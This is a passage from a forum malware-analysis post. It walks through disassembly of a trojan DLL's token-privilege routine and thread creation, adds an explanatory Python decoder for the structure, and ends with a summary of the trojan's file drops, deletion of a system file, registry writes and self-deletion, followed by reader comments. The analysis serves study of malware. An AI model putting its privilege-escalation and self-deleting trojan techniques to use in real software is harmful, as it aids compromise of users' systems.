10005AC5   FF15 C0700010    call dword ptr [100070C0]                    ; kernel32.CloseHandle
10005ACB   8BC3             mov eax, ebx
10005ACD   5F               pop edi
10005ACE   5E               pop esi
10005ACF   5B               pop ebx
10005AD0   C9               leave
10005AD1   C3               retn
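The routine above is the standard enable-a-privilege sequence: OpenProcessToken with access 0x28, LookupPrivilegeValueA for a privilege name the caller passes in [ebp+C] (not visible in the listing, so not guessed here), then AdjustTokenPrivileges twice with the 0x10-byte TOKEN_PRIVILEGES buffers it keeps at ebp-2C and ebp-1C. The first call passes Attributes = 0 and asks for the previous state; the second ORs 2 into that previous state and applies it. After each call it checks GetLastError (resolved by OD to ntdll.RtlGetLastWin32Error) because AdjustTokenPrivileges reports success even when the privilege is not held, signalling that only through ERROR_NOT_ALL_ASSIGNED. The following is an added example, not code from the original post or the DLL: it decodes those constants and checks the frame offsets in the listing against the structure layout; the LUID value used in the demo is arbitrary.

```python
"""Decode the constants in the token routine above and check its stack frame
against the TOKEN_PRIVILEGES layout.

Added example, not code from the original post or the DLL. The privilege name
the DLL passes in [ebp+C] is not visible in the listing, so none is assumed;
the LUID used in the demo at the bottom is arbitrary.
"""
import struct

# OpenProcessToken access mask bits (winnt.h); the routine asks for 0x28.
TOKEN_ACCESS_BITS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}
SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x00000001
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_REMOVED = 0x00000004
SE_PRIVILEGE_USED_FOR_ACCESS = 0x80000000

# TOKEN_PRIVILEGES with a single LUID_AND_ATTRIBUTES entry:
#   DWORD PrivilegeCount; LUID { DWORD LowPart; LONG HighPart }; DWORD Attributes
TOKEN_PRIVILEGES_1 = struct.Struct("<IIiI")
FIELD_NAMES = ("PrivilegeCount", "Luid.LowPart", "Luid.HighPart", "Attributes")


def decode_token_access(mask):
    """Names of the TOKEN_* bits in an access mask, lowest bit first."""
    return [name for bit, name in sorted(TOKEN_ACCESS_BITS.items()) if mask & bit]


def frame_layout(base_offset):
    """ebp-relative offset -> field name for a TOKEN_PRIVILEGES at `base_offset`.

    The listing keeps two of them: NewState at ebp-2C and PreviousState at
    ebp-1C, so the `or dword ptr [ebp-10], 2` hits PreviousState.Attributes.
    """
    offsets = (0, 4, 8, 12)
    return {base_offset + off: name for off, name in zip(offsets, FIELD_NAMES)}


def pack_token_privileges(luid_low, luid_high, attributes):
    """Serialise a one-entry TOKEN_PRIVILEGES; its length is the 0x10 passed as BufferLength."""
    return TOKEN_PRIVILEGES_1.pack(1, luid_low, luid_high, attributes)


def unpack_token_privileges(buf):
    """Inverse of pack_token_privileges, as a dict keyed by field name."""
    return dict(zip(FIELD_NAMES, TOKEN_PRIVILEGES_1.unpack(buf[:TOKEN_PRIVILEGES_1.size])))


def first_call_new_state(luid_low, luid_high):
    """First AdjustTokenPrivileges: count 1, the looked-up LUID, Attributes 0
    (esi), with a PreviousState buffer so the caller learns the current state.
    Attributes 0 disables the privilege if it happened to be enabled."""
    return pack_token_privileges(luid_low, luid_high, 0)


def second_call_new_state(previous_state, luid_low, luid_high):
    """Second call: reuse PreviousState, OR in SE_PRIVILEGE_ENABLED, rewrite
    the LUID and force the count to 1, exactly as the or/mov sequence does."""
    fields = unpack_token_privileges(previous_state)
    return pack_token_privileges(luid_low, luid_high,
                                 fields["Attributes"] | SE_PRIVILEGE_ENABLED)


if __name__ == "__main__":
    print(decode_token_access(0x28))
    print(frame_layout(-0x2C))
    print(frame_layout(-0x1C))
    previous = pack_token_privileges(20, 0, 0)  # arbitrary LUID, currently disabled
    print(unpack_token_privileges(second_call_new_state(previous, 20, 0)))
```

The frame map is the quick sanity check when reading the listing: every offset the code touches (ebp-2C, -28, -24, -20 and ebp-1C, -18, -14, -10) lands on a named field, and ebp-C/-8 is the LUID that LookupPrivilegeValueA filled in.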
Creating two threads (the same helper is called twice):
100057CB   56               push esi
100057CC   8BF1             mov esi, ecx
100057CE   33C0             xor eax, eax
100057D0   3946 04          cmp dword ptr [esi+4], eax
100057D3   75 1E            jnz short 100057F3
100057D5   57               push edi
100057D6   8D7E 08          lea edi, dword ptr [esi+8]
100057D9   57               push edi
100057DA   50               push eax
100057DB   FF7424 18        push dword ptr [esp+18]
100057DF   FF7424 18        push dword ptr [esp+18]
100057E3   50               push eax
100057E4   50               push eax
100057E5   FF15 E0700010    call dword ptr [100070E0]                    ; kernel32.CreateThread
100057EB   8946 04          mov dword ptr [esi+4], eax
100057EE   8B07             mov eax, dword ptr [edi]
100057F0   5F               pop edi
100057F1   EB 02            jmp short 100057F5
100057F3   33C0             xor eax, eax
100057F5   5E               pop esi
100057F6   C2 0800          retn 8
100057CB   56               push esi
100057CC   8BF1             mov esi, ecx
100057CE   33C0             xor eax, eax
100057D0   3946 04          cmp dword ptr [esi+4], eax
100057D3   75 1E            jnz short 100057F3
100057D5   57               push edi
100057D6   8D7E 08          lea edi, dword ptr [esi+8]
100057D9   57               push edi
100057DA   50               push eax
100057DB   FF7424 18        push dword ptr [esp+18]
100057DF   FF7424 18        push dword ptr [esp+18]
100057E3   50               push eax
100057E4   50               push eax
100057E5   FF15 E0700010    call dword ptr [100070E0]                    ; kernel32.CreateThread
100057EB   8946 04          mov dword ptr [esi+4], eax
100057EE   8B07             mov eax, dword ptr [edi]
100057F0   5F               pop edi
100057F1   EB 02            jmp short 100057F5
100057F3   33C0             xor eax, eax
100057F5   5E               pop esi
100057F6   C2 0800          retn 8
------------------------------------------------------------------------
【Summary】Finally, a summary of this trojan's behaviour:
1. Drops two files, PACNkAWTwg4Cyb3e.Ttf and 56BC86C7.dll, into the system root directory.
2. Deletes verclsid.exe from the system32 directory.
3. Writes to the registry:
Contents as shown in the figure:
4. Deletes itself.
------------------------------------------------------------------------
【Copyright】This article was originally written for the 52pojie technical forum; when reposting please credit the author and keep the article intact. Thanks!
Unpacked sample:
Replies:
Learning from this.
Very thorough analysis (*^__^*) hehe, nicely done~
Go on and analyse 56BC86C7.dll too.
Yep, nice analysis, heh!
Agreed, analyse the DLL as well!
(*^__^*) hehe, nicely done~
Mm, learned something, thanks for sharing.
Spot-on analysis. Studying it.
Spot-on analysis.
The threads in that DLL are the key part; trace and analyse those too and you're about there.